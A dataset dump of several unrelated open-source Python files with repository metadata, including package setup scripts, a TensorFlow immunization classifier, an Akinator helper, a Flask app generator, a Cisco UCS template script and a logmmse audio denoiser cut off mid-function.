] | 1 | 2021-04-22T09:22:31.000Z | 2021-04-22T09:22:31.000Z | from setuptools import setup, find_packages
def find_version(path):
import re
# path shall be a plain ascii tetxt file
s = open(path, 'rt').read()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", s, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError('Version not found')
def get_requirements(filename):
with open(filename, 'r') as fh:
return [l.strip() for l in fh]
def get_long_desc(filename):
with open(filename, 'r') as fh:
return fh.read()
setup(
name='athena2pd',
packages=['athena2pd'],
version=find_version('athena2pd/__init__.py'),
description='Help\'s simplify the access of databases stored in Amazon Athena by using SQL and pandas DataFrames.',
long_description=get_long_desc('README.md'),
long_description_content_type='text/markdown',
author='Joe Dementri',
maintainer='Joe Dementri',
maintainer_email='joedementri42012@gmail.com',
license='MIT',
install_requires=get_requirements('requirements.txt'),
zip_safe=False,
url='https://github.com/joedementri/athena2pd',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent'
],
python_requires='>=2.7,>=3.6'
) | 33.466667 | 119 | 0.653386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 660 | 0.438247 |
913effe79b3a41e71c6774354a20673cc5bf2cf7 | 672 | py | Python | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | main.py | hari-sh/sigplot | cd2359d7c868e35ed1d976d7eb8ac35d2dcc7e81 | [
"MIT"
] | null | null | null | import sigplot as sp
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
matplotlib.rcParams['toolbar'] = 'None'
plt.style.use('dark_background')
fig = plt.figure()
# seed = np.linspace(3, 7, 1000)
# a = (np.sin(2 * np.pi * seed))
# b = (np.cos(2 * np.pi * seed))
# sp.correlate(fig, b, a, 300)
t = np.linspace(0, 1, 500)
b = (np.cos(2 * np.pi * t))
# x = np.concatenate([np.zeros(500), signal.sawtooth(2 * np.pi * 5 * t), np.zeros(500), np.ones(120), np.zeros(500)])
x = np.concatenate([np.zeros(500), np.ones(500), np.zeros(500)])
sp.fourier_series(fig, x, 100, 200, 200)
plt.show()
# WriteToVideo("twoPulse.mp4", anim);
| 25.846154 | 118 | 0.623512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 318 | 0.473214 |
914dad243b4f6fd43e52b214d9db3b5771ad2444 | 623 | py | Python | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 13 | 2017-03-31T21:52:19.000Z | 2021-09-06T23:15:30.000Z | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 3 | 2017-05-08T02:27:43.000Z | 2017-05-10T03:20:11.000Z | Perforce/AppUtils.py | TomMinor/MayaPerforce | 52182c7e5c3e91e41973d0c2abbda8880e809e49 | [
"MIT"
] | 3 | 2017-05-05T14:03:03.000Z | 2020-05-25T10:25:04.000Z | import os
import sys
import re
import logging
p4_logger = logging.getLogger("Perforce")
# Import app specific utilities, maya opens scenes differently than nuke etc
# Are we in maya or nuke?
if re.match( "maya", os.path.basename( sys.executable ), re.I ):
p4_logger.info("Configuring for Maya")
from MayaUtils import *
elif re.match( "nuke", os.path.basename( sys.executable ), re.I ):
p4_logger.info("Configuring for Nuke")
from NukeUtils import *
else:
p4_logger.warning("Couldn't find app configuration")
raise ImportError("No supported applications found that this plugin can interface with")
| 32.789474 | 90 | 0.738363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 271 | 0.434992 |
914ea6fbc1fedc5c88691906b2f1c1f56a6d040c | 5,907 | py | Python | fhir/immunizations_demo/models/trainer/model.py | kourtneyshort/healthcare | 1d1e2375304ac99f43a8b6aee7374fcdf641eb6f | [
"Apache-2.0"
] | null | null | null | fhir/immunizations_demo/models/trainer/model.py | kourtneyshort/healthcare | 1d1e2375304ac99f43a8b6aee7374fcdf641eb6f | [
"Apache-2.0"
] | 22 | 2019-12-16T22:18:37.000Z | 2022-03-12T00:04:43.000Z | fhir/immunizations_demo/models/trainer/model.py | kourtneyshort/healthcare | 1d1e2375304ac99f43a8b6aee7374fcdf641eb6f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""A simple logistics regression model for immunization prediction.
The following features are used in this model:
1. age of the patient
2. gender of the patient
3. country the patient is visiting
4. expected duration of stay
5. disease
We are predicting the possibility of the patient getting a disease.
Note that this model is part of an end-to-end demo which shows how
to leverage the Google Cloud Healthcare APIs (FHIR APIs specifically)
to finish data analysis and machine learning tasks. This problem
itself is not a natural machine learning task.
"""
import tensorflow as tf
from functools import reduce
# Input data specific flags.
tf.flags.DEFINE_string("training_data", default=None,
help="Path to training data. This should be a GCS path.")
tf.flags.DEFINE_string("eval_data", default=None,
help="Path to evaluation data. This should be a GCS path.")
# Model specific flags. See more details here:
# https://www.tensorflow.org/api_docs/python/tf/estimator/LinearClassifier
tf.flags.DEFINE_string("model_dir", default=None,
help="Estimator model_dir.")
tf.flags.DEFINE_string("export_model_dir", default=None,
help="Folder to export trained model.")
tf.flags.DEFINE_integer("batch_size", default=96,
help="Mini-batch size for the training.")
tf.flags.DEFINE_integer("training_steps", default=1000,
help="Total number of training steps.")
tf.flags.DEFINE_integer("eval_steps", default=100,
help="Total number of evaluation steps.")
tf.flags.DEFINE_integer("n_classes", default=2,
help="Number of categories to classify to.")
# More advanced flags that controls the behavior of FTRL optimizer.
# See more details here:
# https://www.tensorflow.org/api_docs/python/tf/train/FtrlOptimizer
tf.flags.DEFINE_float("learning_rate", default=0.01,
help="Learning rate")
tf.flags.DEFINE_float("l1_regularization_strength", default=0.005,
help="L1 regularization strength for FTRL optimizer.")
tf.flags.DEFINE_float("l2_regularization_strength", default=0.001,
help="L2 regularization strength for FTRL optimizer.")
FLAGS = tf.flags.FLAGS
# Feature and label keys.
FEATURE_KEYS = ['age', 'gender', 'country', 'duration', 'disease']
LABEL_KEYS = ['risk']
DS_BUFFER_SIZE = 50000
def build_input_fn(filename):
"""Builds the input funciton for training/evaluation.
Args:
filename (string): The path of the file that contains features and
labels. This can be a Google Cloud Storage path (e.g. gs://...).
"""
def input_fn():
"""Input function to be used by the classifier."""
def parse(serialized_example):
"""Parses a single tensorflow example."""
def parse_feature(features, key):
features[key] = tf.FixedLenFeature([], tf.int64)
return features
data = tf.parse_single_example(serialized_example,
features=reduce(parse_feature, FEATURE_KEYS + LABEL_KEYS, {}))
features = [tf.convert_to_tensor(tf.cast(data[key], tf.int32))
for key in FEATURE_KEYS]
labels = [tf.convert_to_tensor(tf.cast(data[key], tf.int32))
for key in LABEL_KEYS]
return features, labels
dataset = tf.data.TFRecordDataset(filename, buffer_size=DS_BUFFER_SIZE)
dataset = dataset.map(parse).cache().repeat()
dataset = dataset.batch(FLAGS.batch_size)
features, labels = dataset.make_one_shot_iterator().get_next()
# Slice features into a dictionary which is expected by the classifier.
features = tf.transpose(features)
def map_feature(dict, idx):
"""Maps individual features into a dictionary."""
dict[FEATURE_KEYS[idx]] = tf.transpose(
tf.nn.embedding_lookup(features, [idx]))
return dict
return reduce(map_feature, list(range(len(FEATURE_KEYS))), {}), labels
return input_fn
def build_serving_input_receiver_fn():
"""Builds a serving_input_receiver_fn which takes JSON as input."""
def serving_input_receiver_fn():
def add_input(inputs, feature):
inputs[feature] = tf.placeholder(shape=[None], dtype=tf.int32)
return inputs
inputs = reduce(add_input, FEATURE_KEYS, {})
return tf.estimator.export.ServingInputReceiver(inputs, inputs)
return serving_input_receiver_fn
def main(_):
# All features have been converted to integer representation beforehand.
feature_columns = [tf.feature_column.numeric_column(key=key, dtype=tf.int32)
for key in FEATURE_KEYS]
classifier = tf.estimator.LinearClassifier(
feature_columns=feature_columns,
model_dir=FLAGS.model_dir,
n_classes=FLAGS.n_classes,
optimizer=tf.train.FtrlOptimizer(
learning_rate=FLAGS.learning_rate,
l1_regularization_strength=FLAGS.l1_regularization_strength,
l2_regularization_strength=FLAGS.l2_regularization_strength),
config=tf.estimator.RunConfig(keep_checkpoint_max=1))
# Training.
classifier.train(
input_fn=build_input_fn(FLAGS.training_data),
steps=FLAGS.training_steps)
# Evaluation.
classifier.evaluate(
input_fn=build_input_fn(FLAGS.eval_data),
steps=FLAGS.eval_steps)
# Export SavedModel.
if FLAGS.export_model_dir is not None:
classifier.export_saved_model(
FLAGS.export_model_dir,
build_serving_input_receiver_fn())
if __name__ == '__main__':
# Set logging level to INFO.
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| 34.54386 | 78 | 0.744033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,749 | 0.46538 |
e66fe14aa361b0d83b0ed955a7d77eeda49c3b80 | 571 | py | Python | face2anime/nb_utils.py | davidleonfdez/face2anime | 896bf85a7aa28322cc9e9e586685db8cbbf39d89 | [
"MIT"
] | null | null | null | face2anime/nb_utils.py | davidleonfdez/face2anime | 896bf85a7aa28322cc9e9e586685db8cbbf39d89 | [
"MIT"
] | 1 | 2022-01-15T23:57:33.000Z | 2022-01-15T23:57:33.000Z | face2anime/nb_utils.py | davidleonfdez/face2anime | 896bf85a7aa28322cc9e9e586685db8cbbf39d89 | [
"MIT"
] | null | null | null | import importlib
__all__ = ['mount_gdrive']
def mount_gdrive() -> str:
"""Mount Google Drive storage of the current Google account and return the root path.
Functionality only available in Google Colab Enviroment; otherwise, it raises a RuntimeError.
"""
if (importlib.util.find_spec("google.colab") is None):
raise RuntimeError("Cannot mount Google Drive outside of Google Colab.")
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
root_dir = "/content/gdrive/My Drive/"
return root_dir
| 28.55 | 97 | 0.712785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 316 | 0.553415 |
e67c30a42d5e25d4e6e974aeebd81a4f702b3cd2 | 5,417 | py | Python | akinator/utils.py | GitHubEmploy/akinator.py | 67c688b0332f4caa72bacc8fbc8f95abfe2290c9 | [
"MIT"
] | null | null | null | akinator/utils.py | GitHubEmploy/akinator.py | 67c688b0332f4caa72bacc8fbc8f95abfe2290c9 | [
"MIT"
] | null | null | null | akinator/utils.py | GitHubEmploy/akinator.py | 67c688b0332f4caa72bacc8fbc8f95abfe2290c9 | [
"MIT"
] | null | null | null | """
MIT License
Copyright (c) 2019 NinjaSnail1080
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from .exceptions import InvalidAnswerError, InvalidLanguageError, AkiConnectionFailure, AkiTimedOut, AkiNoQuestions, AkiServerDown, AkiTechnicalError
import re
import json
def ans_to_id(ans):
"""Convert an input answer string into an Answer ID for Akinator"""
ans = str(ans).lower()
if ans == "yes" or ans == "y" or ans == "0":
return "0"
elif ans == "no" or ans == "n" or ans == "1":
return "1"
elif ans == "i" or ans == "idk" or ans == "i dont know" or ans == "i don't know" or ans == "2":
return "2"
elif ans == "probably" or ans == "p" or ans == "3":
return "3"
elif ans == "probably not" or ans == "pn" or ans == "4":
return "4"
else:
raise InvalidAnswerError("""
You put "{}", which is an invalid answer.
The answer must be one of these:
- "yes" OR "y" OR "0" for YES
- "no" OR "n" OR "1" for NO
- "i" OR "idk" OR "i dont know" OR "i don't know" OR "2" for I DON'T KNOW
- "probably" OR "p" OR "3" for PROBABLY
- "probably not" OR "pn" OR "4" for PROBABLY NOT
""".format(ans))
def get_lang_and_theme(lang=None):
"""Returns the language code and theme based on what is input"""
if lang is None or lang == "en" or lang == "english":
return {"lang": "en", "theme": "c"}
elif lang == "en_animals" or lang == "english_animals":
return {"lang": "en", "theme": "a"}
elif lang == "en_objects" or lang == "english_objects":
return {"lang": "en", "theme": "o"}
elif lang == "ar" or lang == "arabic":
return {"lang": "ar", "theme": "c"}
elif lang == "cn" or lang == "chinese":
return {"lang": "cn", "theme": "c"}
elif lang == "de" or lang == "german":
return {"lang": "de", "theme": "c"}
elif lang == "de_animals" or lang == "german_animals":
return {"lang": "de", "theme": "a"}
elif lang == "es" or lang == "spanish":
return {"lang": "es", "theme": "c"}
elif lang == "es_animals" or lang == "spanish_animals":
return {"lang": "es", "theme": "a"}
elif lang == "fr" or lang == "french":
return {"lang": "fr", "theme": "c"}
elif lang == "fr_animals" or lang == "french_animals":
return {"lang": "fr", "theme": "a"}
elif lang == "fr_objects" or lang == "french_objects":
return {"lang": "fr", "theme": "o"}
elif lang == "il" or lang == "hebrew":
return {"lang": "il", "theme": "c"}
elif lang == "it" or lang == "italian":
return {"lang": "it", "theme": "c"}
elif lang == "it_animals" or lang == "italian_animals":
return {"lang": "it", "theme": "a"}
elif lang == "jp" or lang == "japanese":
return {"lang": "jp", "theme": "c"}
elif lang == "jp_animals" or lang == "japanese_animals":
return {"lang": "jp", "theme": "a"}
elif lang == "kr" or lang == "korean":
return {"lang": "kr", "theme": "c"}
elif lang == "nl" or lang == "dutch":
return {"lang": "nl", "theme": "c"}
elif lang == "pl" or lang == "polish":
return {"lang": "pl", "theme": "c"}
elif lang == "pt" or lang == "portuguese":
return {"lang": "pt", "theme": "c"}
elif lang == "ru" or lang == "russian":
return {"lang": "ru", "theme": "c"}
elif lang == "tr" or lang == "turkish":
return {"lang": "tr", "theme": "c"}
else:
raise InvalidLanguageError("You put \"{}\", which is an invalid language.".format(lang))
def raise_connection_error(response):
"""Raise the proper error if the API failed to connect"""
if response == "KO - SERVER DOWN":
raise AkiServerDown("Akinator's servers are down in this region. Try again later or use a different language")
elif response == "KO - TECHNICAL ERROR":
raise AkiTechnicalError("Akinator's servers have had a technical error. Try again later or use a different language")
elif response == "KO - TIMEOUT":
raise AkiTimedOut("Your Akinator session has timed out")
elif response == "KO - ELEM LIST IS EMPTY" or response == "WARN - NO QUESTION":
raise AkiNoQuestions("\"Akinator.step\" reached 80. No more questions")
else:
raise AkiConnectionFailure("An unknown error has occured. Server response: {}".format(response))
| 44.04065 | 149 | 0.606055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,109 | 0.573934 |
e67e2b8d5cc36e4de07019122375c2f2fc7e621b | 765 | py | Python | ucs-python/create_ucs_sp_template.py | movinalot/ucs | dc0d37784592d6d78f46efee40c86b6f7ac928b4 | [
"MIT"
] | null | null | null | ucs-python/create_ucs_sp_template.py | movinalot/ucs | dc0d37784592d6d78f46efee40c86b6f7ac928b4 | [
"MIT"
] | null | null | null | ucs-python/create_ucs_sp_template.py | movinalot/ucs | dc0d37784592d6d78f46efee40c86b6f7ac928b4 | [
"MIT"
] | 2 | 2020-06-17T15:49:37.000Z | 2021-01-28T07:21:21.000Z | """
create_ucs_sp_template.py
Purpose:
UCS Manager Create a UCS Service Profile Template
Author:
John McDonough (jomcdono@cisco.com) github: (@movinalot)
Cisco Systems, Inc.
"""
from ucsmsdk.ucshandle import UcsHandle
from ucsmsdk.mometa.ls.LsServer import LsServer
from ucsmsdk.mometa.org.OrgOrg import OrgOrg
HANDLE = UcsHandle(
"sandbox-ucsm1.cisco.com",
"admin",
"password"
)
HANDLE.login()
ORG_ORG = OrgOrg(
parent_mo_or_dn='org-root',
name="devnet",
)
HANDLE.add_mo(ORG_ORG, modify_present=True)
HANDLE.commit()
SP_TEMPLATE = LsServer(
parent_mo_or_dn='org-root/org-devnet',
name="devcore_template",
type="updating-template"
)
HANDLE.add_mo(SP_TEMPLATE, modify_present=True)
HANDLE.commit()
HANDLE.logout()
| 19.125 | 60 | 0.732026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 308 | 0.402614 |
e67fead92c8110015c821a38623a6b98e6c63185 | 5,793 | py | Python | create_flask_app.py | Creativity-Hub/create_flask_app | 4c4e2c7360c7773f6f5e3d2fd30e310777650f57 | [
"MIT"
] | 2 | 2020-08-05T04:33:20.000Z | 2020-08-06T23:03:40.000Z | create_flask_app.py | Creativity-Hub/create_flask_app | 4c4e2c7360c7773f6f5e3d2fd30e310777650f57 | [
"MIT"
] | null | null | null | create_flask_app.py | Creativity-Hub/create_flask_app | 4c4e2c7360c7773f6f5e3d2fd30e310777650f57 | [
"MIT"
] | null | null | null | import os
import argparse
def check_for_pkg(pkg):
try:
exec("import " + pkg)
except:
os.system("pip3 install --user " + pkg)
def create_flask_app(app='flask_app', threading=False, wsgiserver=False, unwanted_warnings=False, logging=False, further_logging=False, site_endpoints=None, endpoints=None, request_endpoints=None):
check_for_pkg('flask')
lines = ["from flask import Flask, send_from_directory","import codecs", "import os"]
params = {
'app': app,
'threading': threading,
'wsgiserver': wsgiserver,
'unwanted_warnings': unwanted_warnings,
'logging': logging,
'further_logging': further_logging,
'site_endpoints': site_endpoints,
'endpoints': endpoints,
'request_endpoints': request_endpoints
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
for param in params.keys():
if 'endpoints' in param:
parser.add_argument('-'+param[0].lower(), '--'+param.lower(), nargs='+', help='', required=False)
else:
parser.add_argument('-'+param[0].lower(), '--'+param.lower(), help='', required=False)
args = vars(parser.parse_args())
for param in args.keys():
if 'request' in param and len(args[param]) % 3 != 0:
print('Request method endpoint format invalid, enter "Method" "Endpoint" "Parameter"')
if param == 'app':
if args[param] != None:
params[param] = args[param]
else:
params[param] = args[param]
index = "<!DOCTYPE html>\n<html>\n<head>\n\t<title>endpoint</title>\n\t<link href='static/style.css' rel='stylesheet'>\n</head>\n<body>\n\n<script src='static/script.js'></script>\n</body>\n</html>"
project = params['app']
if not os.path.exists(project):
os.mkdir(project)
if not os.path.exists(project+'/web'):
os.mkdir(project+'/web')
if not os.path.exists(project+'/static'):
os.mkdir(project+'/static')
os.system('touch '+project+'/static/style.css')
os.system('touch '+project+'/static/script.js')
indexFile = open(project+"/web/index.html","w+")
indexFile.write(index.replace('endpoint', project))
indexFile.close()
f = open(project+'/'+project+".py","w+")
headers = {
'threading': ["", "#Threading", "from threading import Thread"],
'wsgiserver': ["", "#WSGIServer", "from gevent.pywsgi import WSGIServer"],
'unwanted_warnings': ["", "#Disable Warnings", "import warnings", "warnings.filterwarnings('ignore')"],
'logging': ["", "#Logging", "import logging", "", "#Logging configuration set to debug on debug.log file", "logging.basicConfig(filename='debug.log',level=logging.DEBUG)", "logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')"],
'further_logging': ["", "#Disable unneeded dependencies logging", "werkzeugLog = logging.getLogger('werkzeug')", "werkzeugLog.disabled = True", "requestsLog = logging.getLogger('urllib3.connectionpool')", "requestsLog.disabled = True"],
}
for param in headers.keys():
if params[param]:
for line in headers[param]:
lines.append(line)
lines.append("\ndef run():")
if params['wsgiserver']:
check_for_pkg('gevent')
lines.append("\t#WSGIServer")
lines.append("\tWSGIServer(('', 8081), app).serve_forever()")
else:
lines.append("\tapp.run(host='0.0.0.0',port=8081)")
if params['threading']:
for line in ["", "#Thread", "def keep_alive():", "\tt = Thread(target=run)", "\tt.start()"]:
lines.append(line)
for line in ["", "app = Flask(__name__)", "", "@app.route('/')", "def main():", "\t#index.html", "\treturn codecs.open('web/index.html', 'r', 'utf-8').read()", "", "@app.route('/favicon.ico')", "def favicon():", "\treturn send_from_directory(os.path.join(app.root_path, 'static'),'favicon.ico', mimetype='image/vnd.microsoft.icon')"]:
lines.append(line)
site_endpoints = params['site_endpoints']
if site_endpoints is not None:
for ep in site_endpoints:
print('Endpoint: ' + ep)
tp = ["\n@app.route('/endpoint')", "def endpoint():", "\t#endpoint.html", "\treturn codecs.open('web/endpoint.html', 'r', 'utf-8').read()"]
for line in tp:
lines.append(line.replace('endpoint', ep))
epFile = open(project+"/web/endpoint.html".replace('endpoint', ep),"w+")
epFile.write(index.replace('endpoint', ep).replace('style.css', ep+'.css').replace('script.js', ep+'.js'))
epFile.close()
os.system('touch '+project+'/static/'+ep+'.css')
os.system('touch '+project+'/static/'+ep+'.js')
endpoints = params['endpoints']
if endpoints is not None:
for ep in endpoints:
print('Endpoint: ' + ep)
tp = ["\n@app.route('/endpoint')", "def endpoint():", "\t#endpoint.html", "\treturn endpoint_route"]
for line in tp:
lines.append(line.replace('endpoint', ep))
request_endpoints = params['request_endpoints']
print(request_endpoints)
request_method = request_endpoints[0]
if request_endpoints is not None:
request_endpoints = [request_endpoints[i * 3:(i + 1) * 3] for i in range((len(request_endpoints) + 3 - 1) // 3)]
for request_method, ep, request_param in request_endpoints:
print('Endpoint: ' + ep, '\nMethod: ' + request_method, '\nParameter: ' + request_param)
tp = ["\n@app.route('/"+ep+"/<"+request_param+">', methods=['"+request_method+"'])", "def "+ep+"("+request_param+"):", "\t#"+request_method+" method endpoint", "\treturn do_something("+request_param+")"]
for line in tp:
lines.append(line)
lines.append("\nif __name__ == '__main__':")
if params['wsgiserver']:
lines.append("\t#Run server forever")
lines.append("\tkeep_alive()")
else:
lines.append("\t#Run server")
lines.append("\trun()")
for line in lines:
f.write(line+'\n')
f.close()
print('Created' + project + ' app succesfully.')
for param in params.keys():
if params[param] and param != 'app':
print(param, params[param])
os.system('open '+ project)
if __name__ == '__main__':
create_flask_app()
| 39.141892 | 335 | 0.666494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,616 | 0.451579 |
e689526fba8d369acce37c9eab4574f56f8a1f4b | 991 | py | Python | setup.py | clach04/discoverhue | 8f35cbc8ff9b5aab80b8be0443427058c1da51ed | [
"MIT"
] | 10 | 2017-09-26T22:34:38.000Z | 2021-11-19T22:37:59.000Z | setup.py | clach04/discoverhue | 8f35cbc8ff9b5aab80b8be0443427058c1da51ed | [
"MIT"
] | 7 | 2018-02-04T19:38:03.000Z | 2021-10-30T13:20:33.000Z | setup.py | clach04/discoverhue | 8f35cbc8ff9b5aab80b8be0443427058c1da51ed | [
"MIT"
] | 4 | 2019-06-28T15:26:45.000Z | 2022-01-20T02:26:05.000Z | from setuptools import setup
try:
import pypandoc
long_description = pypandoc.convert_file('README.md', 'rst', extra_args=())
except ImportError:
import codecs
long_description = codecs.open('README.md', encoding='utf-8').read()
long_description = '\n'.join(long_description.splitlines())
setup(
name='discoverhue',
description='Auto discovery of Hue bridges',
long_description=long_description,
version='1.0.2',
url='https://github.com/Overboard/discoverhue',
author='Overboard',
author_email='amwroute-git@yahoo.com',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='philips hue',
packages=['discoverhue'],
install_requires=['httpfind'],
)
| 26.078947 | 79 | 0.649849 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 427 | 0.430878 |
e68a7efe5fb704c535ff7a5982b5a18ddc07817d | 6,024 | py | Python | utils/logmmse.py | dbonattoj/Real-Time-Voice-Cloning | 7ce361b0e900cb0fad4289884f526578ba276481 | [
"MIT"
] | 3 | 2020-07-10T02:23:00.000Z | 2021-08-17T12:35:09.000Z | utils/logmmse.py | amoliu/Real-Time-Voice-Cloning | 7808d6f80aa9bbaffe367fde07b1c6f96cd3697e | [
"MIT"
] | 1 | 2020-09-30T09:29:57.000Z | 2020-10-31T15:38:50.000Z | utils/logmmse.py | amoliu/Real-Time-Voice-Cloning | 7808d6f80aa9bbaffe367fde07b1c6f96cd3697e | [
"MIT"
] | 5 | 2020-04-23T10:52:30.000Z | 2021-08-17T12:35:19.000Z | # The MIT License (MIT)
#
# Copyright (c) 2015 braindead
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# This code was extracted from the logmmse package (https://pypi.org/project/logmmse/) and I
# simply modified the interface to meet my needs.
import numpy as np
import math
from scipy.special import expn
from collections import namedtuple
NoiseProfile = namedtuple("NoiseProfile", "sampling_rate window_size len1 len2 win n_fft noise_mu2")
def profile_noise(noise, sampling_rate, window_size=0):
"""
Creates a profile of the noise in a given waveform.
:param noise: a waveform containing noise ONLY, as a numpy array of floats or ints.
:param sampling_rate: the sampling rate of the audio
:param window_size: the size of the window the logmmse algorithm operates on. A default value
will be picked if left as 0.
:return: a NoiseProfile object
"""
noise, dtype = to_float(noise)
noise += np.finfo(np.float64).eps
if window_size == 0:
window_size = int(math.floor(0.02 * sampling_rate))
if window_size % 2 == 1:
window_size = window_size + 1
perc = 50
len1 = int(math.floor(window_size * perc / 100))
len2 = int(window_size - len1)
win = np.hanning(window_size)
win = win * len2 / np.sum(win)
n_fft = 2 * window_size
noise_mean = np.zeros(n_fft)
n_frames = len(noise) // window_size
for j in range(0, window_size * n_frames, window_size):
noise_mean += np.absolute(np.fft.fft(win * noise[j:j + window_size], n_fft, axis=0))
noise_mu2 = (noise_mean / n_frames) ** 2
return NoiseProfile(sampling_rate, window_size, len1, len2, win, n_fft, noise_mu2)
def denoise(wav, noise_profile: NoiseProfile, eta=0.15):
"""
Cleans the noise from a speech waveform given a noise profile. The waveform must have the
same sampling rate as the one used to create the noise profile.
:param wav: a speech waveform as a numpy array of floats or ints.
:param noise_profile: a NoiseProfile object that was created from a similar (or a segment of
the same) waveform.
:param eta: voice threshold for noise update. While the voice activation detection value is
below this threshold, the noise profile will be continuously updated throughout the audio.
Set to 0 to disable updating the noise profile.
:return: the clean wav as a numpy array of floats or ints of the same length.
"""
wav, dtype = to_float(wav)
wav += np.finfo(np.float64).eps
p = noise_profile
nframes = int(math.floor(len(wav) / p.len2) - math.floor(p.window_size / p.len2))
x_final = np.zeros(nframes * p.len2)
aa = 0.98
mu = 0.98
ksi_min = 10 ** (-25 / 10)
x_old = np.zeros(p.len1)
xk_prev = np.zeros(p.len1)
noise_mu2 = p.noise_mu2
for k in range(0, nframes * p.len2, p.len2):
insign = p.win * wav[k:k + p.window_size]
spec = np.fft.fft(insign, p.n_fft, axis=0)
sig = np.absolute(spec)
sig2 = sig ** 2
gammak = np.minimum(sig2 / noise_mu2, 40)
if xk_prev.all() == 0:
ksi = aa + (1 - aa) * np.maximum(gammak - 1, 0)
else:
ksi = aa * xk_prev / noise_mu2 + (1 - aa) * np.maximum(gammak - 1, 0)
ksi = np.maximum(ksi_min, ksi)
log_sigma_k = gammak * ksi/(1 + ksi) - np.log(1 + ksi)
vad_decision = np.sum(log_sigma_k) / p.window_size
if vad_decision < eta:
noise_mu2 = mu * noise_mu2 + (1 - mu) * sig2
a = ksi / (1 + ksi)
vk = a * gammak
ei_vk = 0.5 * expn(1, np.maximum(vk, 1e-8))
hw = a * np.exp(ei_vk)
sig = sig * hw
xk_prev = sig ** 2
xi_w = np.fft.ifft(hw * spec, p.n_fft, axis=0)
xi_w = np.real(xi_w)
x_final[k:k + p.len2] = x_old + xi_w[0:p.len1]
x_old = xi_w[p.len1:p.window_size]
output = from_float(x_final, dtype)
output = np.pad(output, (0, len(wav) - len(output)), mode="constant")
return output
def to_float(_input):
if _input.dtype == np.float64:
return _input, _input.dtype
elif _input.dtype == np.float32:
return _input.astype(np.float64), _input.dtype
elif _input.dtype == np.uint8:
return (_input - 128) / 128., _input.dtype
elif _input.dtype == np.int16:
return _input / 32768., _input.dtype
elif _input.dtype == np.int32:
return _input / 2147483648., _input.dtype
raise ValueError('Unsupported wave file format')
def from_float(_input, dtype):
if dtype == np.float64:
return _input, np.float64
elif dtype == np.float32:
return _input.astype(np.float32)
elif dtype == np.uint8:
